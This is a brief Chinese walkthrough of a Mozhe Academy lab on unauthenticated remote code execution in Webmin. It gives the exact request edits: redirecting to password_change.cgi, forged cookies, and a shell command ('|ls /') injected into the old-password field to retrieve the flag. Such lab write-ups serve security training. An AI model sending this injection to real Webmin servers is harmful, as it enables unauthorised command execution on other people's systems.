Webmin未经身份验证的远程代码执行——墨者学院

Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。

没有账号密码,看题目说是非root用户通过post提交数据导致命令注入,所以我们应该抓包!

无账号无密码登陆,用burp抓包

Webmin未经身份验证的远程代码执行——墨者学院_第1张图片

第一步,修改路径 session_ login.cgi 为 password_change.cgi

第二步,修改Cookie为 Cookie: redirect=1; testing=1;sid=x; sessiontest=1

第三步,修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

Webmin未经身份验证的远程代码执行——墨者学院_第2张图片

得到key

Webmin未经身份验证的远程代码执行——墨者学院_第3张图片

你可能感兴趣的:(mozhe,mozhe)